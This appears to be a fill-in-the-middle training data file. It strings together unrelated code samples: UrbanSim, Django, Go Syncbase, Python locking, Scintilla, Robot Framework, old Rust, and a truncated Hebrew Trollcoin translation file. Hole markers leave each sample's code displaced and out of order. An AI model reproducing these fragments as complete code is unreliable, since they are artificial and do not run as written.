from opus_core.datasets.dataset import Dataset
class BuildingLocationChoiceModel(UrbansimBuildingLocationChoiceModel):
# def get_weights_for_sampling_locations(self, agent_set, agents_index, data_objects=None):
# where_developable = where(self.apply_filter(self.filter, None, agent_set, agents_index, data_objects=data_objects))[0]
# weight_array = ones((where_developable.size), dtype=int8) #.astype(bool8)
# return (weight_array, where_developable)
def get_weights_for_sampling_locations_for_estimation(self, agent_set, agents_index):
if self.run_config.get("agent_units_string", None): # needs to be corrected
agent_set.compute_variables(self.run_config["agent_units_string"], dataset_pool=self.dataset_pool)
return self.get_weights_for_sampling_locations(agent_set, agents_index)
def prepare_for_estimate(self, add_member_prefix=True,
specification_dict=None,
specification_storage=None,
specification_table=None,
building_set=None,
buildings_for_estimation_storage=None,
buildings_for_estimation_table=None,
constants=None, base_year=0,
building_categories=None,
location_id_variable=None,
join_datasets=False,
data_objects=None, **kwargs):
<|fim▁hole|> if location_id_variable is not None:
building_set.compute_variables(location_id_variable, resources=Resources(data_objects))
# create agents for estimation
if buildings_for_estimation_storage is not None:
estimation_set = Dataset(in_storage=buildings_for_estimation_storage,
in_table_name=buildings_for_estimation_table,
id_name=building_set.get_id_name(),
dataset_name=building_set.get_dataset_name())
if location_id_variable:
estimation_set.compute_variables(location_id_variable,
resources=Resources(data_objects))
# needs to be a primary attribute because of the join method below
estimation_set.add_primary_attribute(estimation_set.get_attribute(location_id_variable),
VariableName(location_id_variable).alias())
years = estimation_set.get_attribute("scheduled_year")
recent_years = constants['recent_years']
indicator = zeros(estimation_set.size(), dtype="int32")
for year in range(base_year-recent_years, base_year+1):
indicator = logical_or(indicator, years==year)
idx = where(logical_not(indicator))[0]
estimation_set.remove_elements(idx)
#if filter:
#estimation_set.compute_variables(filter, resources=Resources(data_objects))
#index = where(estimation_set.get_attribute(filter) > 0)[0]
#estimation_set.subset_by_index(index, flush_attributes_if_not_loaded=False)
if join_datasets:
building_set.join_by_rows(estimation_set,
require_all_attributes=False,
change_ids_if_not_unique=True)
index = arange(building_set.size()-estimation_set.size(), building_set.size())
else:
index = building_set.get_id_index(estimation_set.get_id_attribute())
else:
if building_set is not None:
index = arange(building_set.size())
else:
index = None
if add_member_prefix:
specification_table = self.group_member.add_member_prefix_to_table_names([specification_table])
from opus_core.model import get_specification_for_estimation
#from urbansim.functions import compute_supply_and_add_to_location_set
specification = get_specification_for_estimation(specification_dict,
specification_storage,
specification_table)
#specification, dummy = AgentLocationChoiceModelMember.prepare_for_estimate(self, add_member_prefix,
#specification_dict, specification_storage,
#specification_table,
#location_id_variable=location_id_variable,
#data_objects=data_objects, **kwargs)
return (specification, index)<|fim▁end|>
|
# buildings = None
if (building_set is not None):
|
<|file_name|>noBlankLinesAfterLocalImports_after.py<|end_file_name|><|fim▁begin|>from pprint import pprint
VAR = 42
<|fim▁hole|>
class C:
from textwrap import dedent
pass
import codecs as C
pass<|fim▁end|>
|
def foo():
import sys
import ast, tokenize
pass
|
<|file_name|>views.py<|end_file_name|><|fim▁begin|>from django.contrib import messages
from django.db.models import Q
from django.http import Http404
from django.views.generic.detail import DetailView
from django.views.generic.list import ListView
from django.shortcuts import render, get_object_or_404, redirect
from django.utils import timezone
# Create your views here.
from .forms import VariationInventoryFormSet
from .mixins import StaffRequiredMixin
from .models import Product, Variation, Category
class CategoryListView(ListView):
model = Category
queryset = Category.objects.all()
template_name = "products/product_list.html"
class CategoryDetailView(DetailView):
model = Category
def get_context_data(self, *args, **kwargs):
context = super(CategoryDetailView, self).get_context_data(*args, **kwargs)
obj = self.get_object()
product_set = obj.product_set.all()
default_products = obj.default_category.all()
products = ( product_set | default_products ).distinct()
context["products"] = products
return context
class VariationListView(StaffRequiredMixin, ListView):
model = Variation
queryset = Variation.objects.all()
def get_context_data(self, *args, **kwargs):
context = super(VariationListView, self).get_context_data(*args, **kwargs)
context["formset"] = VariationInventoryFormSet(queryset=self.get_queryset())
return context
def get_queryset(self, *args, **kwargs):
product_pk = self.kwargs.get("pk")
if product_pk:
product = get_object_or_404(Product, pk=product_pk)
queryset = Variation.objects.filter(product=product)
return queryset<|fim▁hole|> formset.save(commit=False)
for form in formset:
new_item = form.save(commit=False)
#if new_item.title:
product_pk = self.kwargs.get("pk")
product = get_object_or_404(Product, pk=product_pk)
new_item.product = product
new_item.save()
messages.success(request, "Your inventory and pricing has been updated.")
return redirect("products")
raise Http404
class ProductListView(ListView):
model = Product
queryset = Product.objects.all()
def get_context_data(self, *args, **kwargs):
context = super(ProductListView, self).get_context_data(*args, **kwargs)
context["now"] = timezone.now()
context["query"] = self.request.GET.get("q") #None
return context
def get_queryset(self, *args, **kwargs):
qs = super(ProductListView, self).get_queryset(*args, **kwargs)
query = self.request.GET.get("q")
if query:
qs = self.model.objects.filter(
Q(title__icontains=query) |
Q(description__icontains=query)
)
try:
qs2 = self.model.objects.filter(
Q(price=query)
)
qs = (qs | qs2).distinct()
except:
pass
return qs
import random
class ProductDetailView(DetailView):
model = Product
#template_name = "product.html"
#template_name = "<appname>/<modelname>_detail.html"
def get_context_data(self, *args, **kwargs):
context = super(ProductDetailView, self).get_context_data(*args, **kwargs)
instance = self.get_object()
#order_by("-title")
context["related"] = sorted(Product.objects.get_related(instance)[:6], key= lambda x: random.random())
return context
def product_detail_view_func(request, id):
#product_instance = Product.objects.get(id=id)
product_instance = get_object_or_404(Product, id=id)
try:
product_instance = Product.objects.get(id=id)
except Product.DoesNotExist:
raise Http404
except:
raise Http404
template = "products/product_detail.html"
context = {
"object": product_instance
}
return render(request, template, context)<|fim▁end|>
|
def post(self, request, *args, **kwargs):
formset = VariationInventoryFormSet(request.POST, request.FILES)
if formset.is_valid():
|
<|file_name|>watcher.go<|end_file_name|><|fim▁begin|>// Copyright 2016 The Vanadium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
package client
import (
"strings"
"sync"
"v.io/v23/context"
wire "v.io/v23/services/syncbase"
"v.io/v23/services/watch"
"v.io/v23/syncbase"
"v.io/v23/syncbase/util"
"v.io/v23/verror"
"v.io/x/ref/services/syncbase/longevity_tests/model"
)
// Watcher is a client that watches a range of keys in a set of database collections.
type Watcher struct {
// Prefix to watch. Defaults to empty string.
// TODO(nlacasse): Allow different prefixes per collection?
Prefix string
// ResumeMarker to begin watching from.
// TODO(nlacasse): Allow different ResumeMarkers per collection?
ResumeMarker watch.ResumeMarker
// OnChange runs for each WatchChange. Must be goroutine-safe. By default
// this will be a no-op.
OnChange func(syncbase.WatchChange)
ctx *context.T
// Map of databases and their respective collections.
dbColMap map[syncbase.Database][]syncbase.Collection
stopChan chan struct{}
err error
errMu sync.Mutex
// wg waits until all spawned goroutines stop.
wg sync.WaitGroup
}
var _ Client = (*Watcher)(nil)
func (w *Watcher) String() string {
dbNames := []string{}
for db := range w.dbColMap {
dbNames = append(dbNames, db.Id().Name)
}
return strings.Join(append([]string{"Watcher"}, dbNames...), "-")
}
func (w *Watcher) Start(ctx *context.T, sbName string, dbModels model.DatabaseSet) {
w.ctx = ctx
w.err = nil
w.stopChan = make(chan struct{})
w.wg.Add(1)
go func() {
defer w.wg.Done()
var err error
w.dbColMap, _, err = CreateDbsAndCollections(ctx, sbName, dbModels)
if err != nil {
w.setError(err)
return
}
for db, colSlice := range w.dbColMap {
for _, col := range colSlice {
// Create a watch stream for the collection.
// TODO(ivanpi): Simplify now that Watch can span collections.
stream := db.Watch(ctx, w.ResumeMarker, []wire.CollectionRowPattern{
util.RowPrefixPattern(col.Id(), w.Prefix),
})
defer stream.Cancel()
// Spawn a goroutine to repeatedly call stream.Advance() and
// process any changes.
w.wg.Add(1)
go func() {
defer w.wg.Done()
for {
advance := stream.Advance()
if !advance {
if err := stream.Err(); err != nil && verror.ErrorID(err) != verror.ErrCanceled.ID {
w.setError(err)
}
return<|fim▁hole|> w.OnChange(change)
}
}
}()
}
}
// Wait for stopChan to close.
<-w.stopChan
}()
}
func (w *Watcher) Stop() error {
close(w.stopChan)
w.wg.Wait()
return w.err
}
func (w *Watcher) setError(err error) {
w.errMu.Lock()
defer w.errMu.Unlock()
if err != nil && w.err == nil {
w.err = err
}
}<|fim▁end|>
|
}
change := stream.Change()
if w.OnChange != nil {
|
<|file_name|>utils.py<|end_file_name|><|fim▁begin|>import os
import errno
import fcntl
from contextlib import contextmanager
from time import time, sleep
@contextmanager
def wlock(filename, retry_interval=0.05):
# returns: write, exists, fd
try:
with open(filename, 'rb+') as lock:
try:
fcntl.flock(lock, fcntl.LOCK_EX | fcntl.LOCK_NB)
except IOError as exc:
if exc.errno == errno.EAGAIN:
while True:
try:
fcntl.flock(lock, fcntl.LOCK_SH | fcntl.LOCK_NB)
except IOError as exc:
if exc.errno == errno.EAGAIN:
sleep(retry_interval)
continue
else:<|fim▁hole|> else:
raise
else:
yield True, True, lock
except IOError as exc:
if exc.errno == errno.ENOENT:
with open(filename, 'wb') as lock:
while True:
try:
fcntl.flock(lock, fcntl.LOCK_EX | fcntl.LOCK_NB)
except IOError as exc:
if exc.errno == errno.EAGAIN:
sleep(retry_interval)
continue
else:
raise
else:
yield True, False, lock
if os.path.exists(filename):
if not lock.closed:
lock.seek(0, 2)
if not lock.tell():
os.unlink(filename)
elif not os.path.getsize(filename):
os.unlink(filename)
break
else:
raise
class Timer:
def __init__(self):
self.start = time()
def __str__(self):
return '%.3f ms' % ((time() - self.start) * 1000)<|fim▁end|>
|
raise
else:
yield False, True, lock
break
|
<|file_name|>XiteQt.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
import ctypes, os, sys, unittest
from PySide.QtCore import *
from PySide.QtGui import *
import ScintillaCallable
sys.path.append("..")
from bin import ScintillaEditPy
scintillaDirectory = ".."
scintillaIncludeDirectory = os.path.join(scintillaDirectory, "include")
sys.path.append(scintillaIncludeDirectory)
import Face
class Form(QDialog):
def __init__(self, parent=None):
super(Form, self).__init__(parent)
self.resize(460,300)
# Create widget
self.edit = ScintillaEditPy.ScintillaEdit(self)
class XiteWin():
def __init__(self, test=""):
self.face = Face.Face()
self.face.ReadFromFile(os.path.join(scintillaIncludeDirectory, "Scintilla.iface"))
self.test = test
self.form = Form()
scifn = self.form.edit.send(int(self.face.features["GetDirectFunction"]["Value"]), 0, 0)
sciptr = ctypes.c_char_p(self.form.edit.send(
int(self.face.features["GetDirectPointer"]["Value"]), 0,0))
self.ed = ScintillaCallable.ScintillaCallable(self.face, scifn, sciptr)
self.form.show()
def DoStuff(self):
print(self.test)
self.CmdTest()
def DoEvents(self):
QApplication.processEvents()
def CmdTest(self):
runner = unittest.TextTestRunner()
tests = unittest.defaultTestLoader.loadTestsFromName(self.test)
results = runner.run(tests)
print(results)
sys.exit(0)
xiteFrame = None
def main(test):
global xiteFrame
app = QApplication(sys.argv)
xiteFrame = XiteWin(test)
xiteFrame.DoStuff()
<|fim▁hole|><|fim▁end|>
|
sys.exit(app.exec_())
|
<|file_name|>_screenshot.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
import os
import robot
from keywordgroup import KeywordGroup
class _ScreenshotKeywords(KeywordGroup):
def __init__(self):
self._screenshot_index = 0
# Public
def capture_page_screenshot(self, filename=None):
"""Takes a screenshot of the current page and embeds it into the log.
`filename` argument specifies the name of the file to write the
screenshot into. If no `filename` is given, the screenshot is saved into file
`appium-screenshot-<counter>.png` under the directory where
the Robot Framework log file is written into. The `filename` is
also considered relative to the same directory, if it is not
given in absolute format.
`css` can be used to modify how the screenshot is taken. By default
the bakground color is changed to avoid possible problems with
background leaking when the page layout is somehow broken.
"""
path, link = self._get_screenshot_paths(filename)
if hasattr(self._current_application(), 'get_screenshot_as_file'):
self._current_application().get_screenshot_as_file(path)
else:
self._current_application().save_screenshot(path)
# Image is shown on its own row and thus prev row is closed on purpose
self._html('</td></tr><tr><td colspan="3"><a href="%s">'
'<img src="%s" width="800px"></a>' % (link, link))
# Private
def _get_screenshot_paths(self, filename):
if not filename:
self._screenshot_index += 1
filename = 'appium-screenshot-%d.png' % self._screenshot_index
else:
filename = filename.replace('/', os.sep)
logdir = self._get_log_dir()
path = os.path.join(logdir, filename)
<|fim▁hole|> return path, link<|fim▁end|>
|
link = robot.utils.get_link_path(path, logdir)
|
<|file_name|>uniq-cc-generic.rs<|end_file_name|><|fim▁begin|>// Copyright 2012-2013 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
use std::ptr;
enum maybe_pointy {
none,
p(@mut Pointy),
}
struct Pointy {
a : maybe_pointy,
d : ~fn() -> uint,
}<|fim▁hole|>
fn make_uniq_closure<A:Send>(a: A) -> ~fn() -> uint {
let result: ~fn() -> uint = || ptr::to_unsafe_ptr(&a) as uint;
result
}
fn empty_pointy() -> @mut Pointy {
return @mut Pointy {
a : none,
d : make_uniq_closure(~"hi")
}
}
pub fn main() {
let v = empty_pointy();
v.a = p(v);
}<|fim▁end|>
| |
<|file_name|>bitcoin_he.ts<|end_file_name|><|fim▁begin|><?xml version="1.0" ?><!DOCTYPE TS><TS language="he" version="2.0">
<defaultcodec>UTF-8</defaultcodec>
<context>
<name>AboutDialog</name>
<message>
<location filename="../forms/aboutdialog.ui" line="+14"/>
<source>About Trollcoin</source>
<translation>אודות לייטקוין</translation>
</message>
<message>
<location line="+39"/>
<source><b>Trollcoin</b> version</source>
<translation>גרסת <b>לייטקוין</b></translation>
</message>
<message>
<location line="+57"/>
<source>
This is experimental software.
Distributed under the MIT/X11 software license, see the accompanying file COPYING or http://www.opensource.org/licenses/mit-license.php.
This product includes software developed by the OpenSSL Project for use in the OpenSSL Toolkit (http://www.openssl.org/) and cryptographic software written by Eric Young (eay@cryptsoft.com) and UPnP software written by Thomas Bernard.</source>
<translation>
זוהי תוכנה ניסיונית.
מופצת תחת רישיון התוכנה MIT/X11, ראה את הקובץ המצורף COPYING או http://www.opensource.org/licenses/mit-license.php.
המוצר הזה כולל תוכנה שפותחה ע"י פרויקט OpenSSL לשימוש בתיבת הכלים OpenSSL (http://www.openssl.org/) ותוכנה קריפטוגרפית שנכתבה ע"י אריק יאנג (eay@cryptsoft.com) ותוכנת UPnP שנכתבה ע"י תומס ברנרד.</translation>
</message>
<message>
<location filename="../aboutdialog.cpp" line="+14"/>
<source>Copyright</source>
<translation>זכויות יוצרים</translation>
</message>
<message>
<location line="+0"/>
<source>The Trollcoin developers</source>
<translation type="unfinished"/>
</message>
</context>
<context>
<name>AddressBookPage</name>
<message>
<location filename="../forms/addressbookpage.ui" line="+14"/>
<source>Address Book</source>
<translation>פנקס כתובות</translation>
</message>
<message>
<location line="+19"/>
<source>Double-click to edit address or label</source>
<translation>לחץ לחיצה כפולה לערוך כתובת או תוית</translation>
</message>
<message>
<location line="+27"/>
<source>Create a new address</source>
<translation>יצירת כתובת חדשה</translation>
</message>
<message>
<location line="+14"/>
<source>Copy the currently selected address to the system clipboard</source>
<translation>העתק את הכתובת המסומנת ללוח העריכה</translation>
</message>
<message>
<location line="-11"/>
<source>&New Address</source>
<translation>כתובת חדשה</translation>
</message>
<message>
<location filename="../addressbookpage.cpp" line="+63"/>
<source>These are your Trollcoin addresses for receiving payments. You may want to give a different one to each sender so you can keep track of who is paying you.</source>
<translation>אלה כתובת הלייטקוין שלך עבור קבלת תשלומים. ייתכן ותרצה לתת כתובת שונה לכל שולח כדי שתוכל לעקוב אחר מי משלם לך.</translation>
</message>
<message>
<location filename="../forms/addressbookpage.ui" line="+14"/>
<source>&Copy Address</source>
<translation>העתק כתובת</translation>
</message>
<message>
<location line="+11"/>
<source>Show &QR Code</source>
<translation>הצג &קוד QR</translation>
</message>
<message>
<location line="+11"/>
<source>Sign a message to prove you own a Trollcoin address</source>
<translation>חתום על הודעה בכדי להוכיח כי אתה הבעלים של כתובת לייטקוין.</translation>
</message>
<message>
<location line="+3"/>
<source>Sign &Message</source>
<translation>חתום על הודעה</translation>
</message>
<message>
<location line="+25"/>
<source>Delete the currently selected address from the list</source>
<translation>מחק את הכתובת שנבחרה מהרשימה</translation>
</message>
<message>
<location line="+27"/>
<source>Export the data in the current tab to a file</source>
<translation>יצוא הנתונים בטאב הנוכחי לקובץ</translation>
</message>
<message>
<location line="+3"/>
<source>&Export</source>
<translation type="unfinished"/>
</message>
<message>
<location line="-44"/>
<source>Verify a message to ensure it was signed with a specified Trollcoin address</source>
<translation>אמת הודעה בכדי להבטיח שהיא נחתמה עם כתובת לייטקוין מסוימת.</translation>
</message>
<message>
<location line="+3"/>
<source>&Verify Message</source>
<translation>אמת הודעה</translation>
</message>
<message>
<location line="+14"/>
<source>&Delete</source>
<translation>מחק</translation>
</message>
<message>
<location filename="../addressbookpage.cpp" line="-5"/>
<source>These are your Trollcoin addresses for sending payments. Always check the amount and the receiving address before sending coins.</source>
<translation>אלה כתובת הלייטקוין שלך עבור שליחת תשלומים. תמיד בדוק את מספר ואת כתובות מקבלי התשלומים לפני שליחת מטבעות.</translation>
</message>
<message>
<location line="+13"/>
<source>Copy &Label</source>
<translation>העתק תוית</translation>
</message>
<message>
<location line="+1"/>
<source>&Edit</source>
<translation>עריכה</translation>
</message>
<message>
<location line="+1"/>
<source>Send &Coins</source>
<translation>שלח מטבעות</translation>
</message>
<message>
<location line="+260"/>
<source>Export Address Book Data</source>
<translation>יצוא נתוני פנקס כתובות</translation>
</message>
<message>
<location line="+1"/>
<source>Comma separated file (*.csv)</source>
<translation>קובץ מופרד בפסיקים (*.csv)</translation>
</message>
<message>
<location line="+13"/>
<source>Error exporting</source>
<translation>שגיאה ביצוא</translation>
</message>
<message>
<location line="+0"/>
<source>Could not write to file %1.</source>
<translation>לא מסוגל לכתוב לקובץ %1.</translation>
</message>
</context>
<context>
<name>AddressTableModel</name>
<message>
<location filename="../addresstablemodel.cpp" line="+144"/>
<source>Label</source>
<translation>תוית</translation>
</message>
<message>
<location line="+0"/>
<source>Address</source>
<translation>כתובת</translation>
</message>
<message>
<location line="+36"/>
<source>(no label)</source>
<translation>(ללא תוית)</translation>
</message>
</context>
<context>
<name>AskPassphraseDialog</name>
<message>
<location filename="../forms/askpassphrasedialog.ui" line="+26"/>
<source>Passphrase Dialog</source>
<translation>שיח סיסמא</translation>
</message>
<message>
<location line="+21"/>
<source>Enter passphrase</source>
<translation>הכנס סיסמא</translation>
</message>
<message>
<location line="+14"/>
<source>New passphrase</source>
<translation>סיסמה חדשה</translation>
</message>
<message>
<location line="+14"/>
<source>Repeat new passphrase</source>
<translation>חזור על הסיסמה החדשה</translation>
</message>
<message>
<location filename="../askpassphrasedialog.cpp" line="+33"/>
<source>Enter the new passphrase to the wallet.<br/>Please use a passphrase of <b>10 or more random characters</b>, or <b>eight or more words</b>.</source>
<translation>הכנס את הסיסמה החדשה לארנק. <br/>אנא השתמש בסיסמה המכילה <b>10 תוים אקראיים או יותר</b>, או <b>שמונה מילים או יותר</b>.</translation>
</message>
<message>
<location line="+1"/>
<source>Encrypt wallet</source>
<translation>הצפן ארנק</translation>
</message>
<message>
<location line="+3"/>
<source>This operation needs your wallet passphrase to unlock the wallet.</source>
<translation>הפעולה הזו דורשת את סיסמת הארנק שלך בשביל לפתוח את הארנק.</translation>
</message>
<message>
<location line="+5"/>
<source>Unlock wallet</source>
<translation>פתיחת ארנק</translation>
</message>
<message>
<location line="+3"/>
<source>This operation needs your wallet passphrase to decrypt the wallet.</source>
<translation>הפעולה הזו דורשת את סיסמת הארנק שלך בשביל לפענח את הארנק.</translation>
</message>
<message>
<location line="+5"/>
<source>Decrypt wallet</source>
<translation>פענוח ארנק</translation>
</message>
<message>
<location line="+3"/>
<source>Change passphrase</source>
<translation>שינוי סיסמה</translation>
</message>
<message>
<location line="+1"/>
<source>Enter the old and new passphrase to the wallet.</source>
<translation>הכנס את הסיסמות הישנה והחדשה לארנק.</translation>
</message>
<message>
<location line="+46"/>
<source>Confirm wallet encryption</source>
<translation>אשר הצפנת ארנק</translation>
</message>
<message>
<location line="+1"/>
<source>Warning: If you encrypt your wallet and lose your passphrase, you will <b>LOSE ALL OF YOUR TROLLCOINS</b>!</source>
<translation>אזהרה: אם אתה מצפין את הארנק ומאבד את הסיסמא, אתה <b>תאבד את כל הלייטקוינים שלך</b>!</translation>
</message>
<message>
<location line="+0"/>
<source>Are you sure you wish to encrypt your wallet?</source>
<translation>האם אתה בטוח שברצונך להצפין את הארנק?</translation>
</message>
<message>
<location line="+15"/>
<source>IMPORTANT: Any previous backups you have made of your wallet file should be replaced with the newly generated, encrypted wallet file. For security reasons, previous backups of the unencrypted wallet file will become useless as soon as you start using the new, encrypted wallet.</source>
<translation>חשוב! כל גיבוי קודם שעשית לארנק שלך יש להחליף עם קובץ הארנק המוצפן שזה עתה נוצר. מסיבות אבטחה, גיבויים קודמים של קובץ הארנק הלא-מוצפן יהפכו לחסרי שימוש ברגע שתתחיל להשתמש בארנק החדש המוצפן.</translation>
</message>
<message>
<location line="+100"/>
<location line="+24"/>
<source>Warning: The Caps Lock key is on!</source>
<translation>זהירות: מקש Caps Lock מופעל!</translation>
</message>
<message>
<location line="-130"/>
<location line="+58"/>
<source>Wallet encrypted</source>
<translation>הארנק הוצפן</translation>
</message>
<message>
<location line="-56"/>
<source>Trollcoin will close now to finish the encryption process. Remember that encrypting your wallet cannot fully protect your trollcoins from being stolen by malware infecting your computer.</source>
<translation>לייטקוין ייסגר עכשיו כדי להשלים את תהליך ההצפנה. זכור שהצפנת הארנק שלך אינו יכול להגן באופן מלא על הלייטקוינים שלך מתוכנות זדוניות המושתלות על המחשב.</translation>
</message>
<message>
<location line="+13"/>
<location line="+7"/>
<location line="+42"/>
<location line="+6"/>
<source>Wallet encryption failed</source>
<translation>הצפנת הארנק נכשלה</translation>
</message>
<message>
<location line="-54"/>
<source>Wallet encryption failed due to an internal error. Your wallet was not encrypted.</source>
<translation>הצפנת הארנק נכשלה עקב שגיאה פנימית. הארנק שלך לא הוצפן.</translation>
</message>
<message>
<location line="+7"/>
<location line="+48"/>
<source>The supplied passphrases do not match.</source>
<translation>הסיסמות שניתנו אינן תואמות.</translation>
</message>
<message>
<location line="-37"/>
<source>Wallet unlock failed</source>
<translation>פתיחת הארנק נכשלה</translation>
</message>
<message>
<location line="+1"/>
<location line="+11"/>
<location line="+19"/>
<source>The passphrase entered for the wallet decryption was incorrect.</source>
<translation>הסיסמה שהוכנסה לפענוח הארנק שגויה.</translation>
</message>
<message>
<location line="-20"/>
<source>Wallet decryption failed</source>
<translation>פענוח הארנק נכשל</translation>
</message>
<message>
<location line="+14"/>
<source>Wallet passphrase was successfully changed.</source>
<translation>סיסמת הארנק שונתה בהצלחה.</translation>
</message>
</context>
<context>
<name>BitcoinGUI</name>
<message>
<location filename="../bitcoingui.cpp" line="+233"/>
<source>Sign &message...</source>
<translation>חתום על הודעה</translation>
</message>
<message>
<location line="+280"/>
<source>Synchronizing with network...</source>
<translation>מסתנכרן עם הרשת...</translation>
</message>
<message>
<location line="-349"/>
<source>&Overview</source>
<translation>&סקירה</translation>
</message>
<message>
<location line="+1"/>
<source>Show general overview of wallet</source>
<translation>הצג סקירה כללית של הארנק</translation>
</message>
<message>
<location line="+20"/>
<source>&Transactions</source>
<translation>&פעולות</translation>
</message>
<message>
<location line="+1"/>
<source>Browse transaction history</source>
<translation>דפדף בהיסטוריית הפעולות</translation>
</message>
<message>
<location line="+7"/>
<source>Edit the list of stored addresses and labels</source>
<translation>ערוך את רשימת הכתובות והתויות</translation>
</message>
<message>
<location line="-14"/>
<source>Show the list of addresses for receiving payments</source>
<translation>הצג את רשימת הכתובות לקבלת תשלומים</translation>
</message>
<message>
<location line="+31"/>
<source>E&xit</source>
<translation>י&ציאה</translation>
</message>
<message>
<location line="+1"/>
<source>Quit application</source>
<translation>סגור תוכנה</translation>
</message>
<message>
<location line="+4"/>
<source>Show information about Trollcoin</source>
<translation>הצג מידע על לייטקוין</translation>
</message>
<message>
<location line="+2"/>
<source>About &Qt</source>
<translation>אודות Qt</translation>
</message>
<message>
<location line="+1"/>
<source>Show information about Qt</source>
<translation>הצג מידע על Qt</translation>
</message>
<message>
<location line="+2"/>
<source>&Options...</source>
<translation>&אפשרויות</translation>
</message>
<message>
<location line="+6"/>
<source>&Encrypt Wallet...</source>
<translation>הצפן ארנק</translation>
</message>
<message>
<location line="+3"/>
<source>&Backup Wallet...</source>
<translation>גיבוי ארנק</translation>
</message>
<message>
<location line="+2"/>
<source>&Change Passphrase...</source>
<translation>שנה סיסמא</translation>
</message>
<message>
<location line="+285"/>
<source>Importing blocks from disk...</source>
<translation>מייבא בלוקים מהדיסק...</translation>
</message>
<message>
<location line="+3"/>
<source>Reindexing blocks on disk...</source>
<translation>מחדש את אינדקס הבלוקים בדיסק...</translation>
</message>
<message>
<location line="-347"/>
<source>Send coins to a Trollcoin address</source>
<translation>שלח מטבעות לכתובת לייטקוין</translation>
</message>
<message>
<location line="+49"/>
<source>Modify configuration options for Trollcoin</source>
<translation>שנה אפשרויות תצורה עבור לייטקוין</translation>
</message>
<message>
<location line="+9"/>
<source>Backup wallet to another location</source>
<translation>גיבוי הארנק למקום אחר</translation>
</message>
<message>
<location line="+2"/>
<source>Change the passphrase used for wallet encryption</source>
<translation>שנה את הסיסמה להצפנת הארנק</translation>
</message>
<message>
<location line="+6"/>
<source>&Debug window</source>
<translation>חלון ניפוי</translation>
</message>
<message>
<location line="+1"/>
<source>Open debugging and diagnostic console</source>
<translation>פתח את לוח הבקרה לאבחון וניפוי</translation>
</message>
<message>
<location line="-4"/>
<source>&Verify message...</source>
<translation>אמת הודעה...</translation>
</message>
<message>
<location line="-165"/>
<location line="+530"/>
<source>Trollcoin</source>
<translation>לייטקוין</translation>
</message>
<message>
<location line="-530"/>
<source>Wallet</source>
<translation>ארנק</translation>
</message>
<message>
<location line="+101"/>
<source>&Send</source>
<translation>ושלח</translation>
</message>
<message>
<location line="+7"/>
<source>&Receive</source>
<translation>וקבל</translation>
</message>
<message>
<location line="+14"/>
<source>&Addresses</source>
<translation>וכתובות</translation>
</message>
<message>
<location line="+22"/>
<source>&About Trollcoin</source>
<translation>אודות לייטקוין</translation>
</message>
<message>
<location line="+9"/>
<source>&Show / Hide</source>
<translation>הצג / הסתר</translation>
</message>
<message>
<location line="+1"/>
<source>Show or hide the main Window</source>
<translation>הצג או הסתר את החלון הראשי</translation>
</message>
<message>
<location line="+3"/>
<source>Encrypt the private keys that belong to your wallet</source>
<translation>הצפן את המפתחות הפרטיים ששייכים לארנק שלך</translation>
</message>
<message>
<location line="+7"/>
<source>Sign messages with your Trollcoin addresses to prove you own them</source>
<translation>חתום על הודעות עם כתובות הלייטקוין שלך כדי להוכיח שהן בבעלותך</translation>
</message>
<message>
<location line="+2"/>
<source>Verify messages to ensure they were signed with specified Trollcoin addresses</source>
<translation>אמת הודעות כדי להבטיח שהן נחתמו עם כתובת לייטקוין מסוימות</translation>
</message>
<message>
<location line="+28"/>
<source>&File</source>
<translation>&קובץ</translation>
</message>
<message>
<location line="+7"/>
<source>&Settings</source>
<translation>ה&גדרות</translation>
</message>
<message>
<location line="+6"/>
<source>&Help</source>
<translation>&עזרה</translation>
</message>
<message>
<location line="+9"/>
<source>Tabs toolbar</source>
<translation>סרגל כלים טאבים</translation>
</message>
<message>
<location line="+17"/>
<location line="+10"/>
<source>[testnet]</source>
<translation>[רשת-בדיקה]</translation>
</message>
<message>
<location line="+47"/>
<source>Trollcoin client</source>
<translation>תוכנת לייטקוין</translation>
</message>
<message numerus="yes">
<location line="+141"/>
<source>%n active connection(s) to Trollcoin network</source>
<translation><numerusform>חיבור פעיל אחד לרשת הלייטקוין</numerusform><numerusform>%n חיבורים פעילים לרשת הלייטקוין</numerusform></translation>
</message>
<message>
<location line="+22"/>
<source>No block source available...</source>
<translation type="unfinished"/>
</message>
<message>
<location line="+12"/>
<source>Processed %1 of %2 (estimated) blocks of transaction history.</source>
<translation>1% מתוך 2% (משוער) בלוקים של הסטוריית פעולת עובדו </translation>
</message>
<message>
<location line="+4"/>
<source>Processed %1 blocks of transaction history.</source>
<translation>הושלם עיבוד של %1 בלוקים של היסטוריית פעולות.</translation>
</message>
<message numerus="yes">
<location line="+20"/>
<source>%n hour(s)</source>
<translation><numerusform>%n שעה</numerusform><numerusform>%n שעות</numerusform></translation>
</message>
<message numerus="yes">
<location line="+4"/>
<source>%n day(s)</source>
<translation><numerusform>%n יום</numerusform><numerusform>%n ימים</numerusform></translation>
</message>
<message numerus="yes">
<location line="+4"/>
<source>%n week(s)</source>
<translation><numerusform>%n שבוע</numerusform><numerusform>%n שבועות</numerusform></translation>
</message>
<message>
<location line="+4"/>
<source>%1 behind</source>
<translation>1% מאחור</translation>
</message>
<message>
<location line="+14"/>
<source>Last received block was generated %1 ago.</source>
<translation>הבלוק האחרון שהתקבל נוצר לפני %1</translation>
</message>
<message>
<location line="+2"/>
<source>Transactions after this will not yet be visible.</source>
<translation>לאחר זאת פעולות נספות טרם יהיו גלויות</translation>
</message>
<message>
<location line="+22"/>
<source>Error</source>
<translation>שגיאה</translation>
</message>
<message>
<location line="+3"/>
<source>Warning</source>
<translation>אזהרה</translation>
</message>
<message>
<location line="+3"/>
<source>Information</source>
<translation>מידע</translation>
</message>
<message>
<location line="+70"/>
<source>This transaction is over the size limit. You can still send it for a fee of %1, which goes to the nodes that process your transaction and helps to support the network. Do you want to pay the fee?</source>
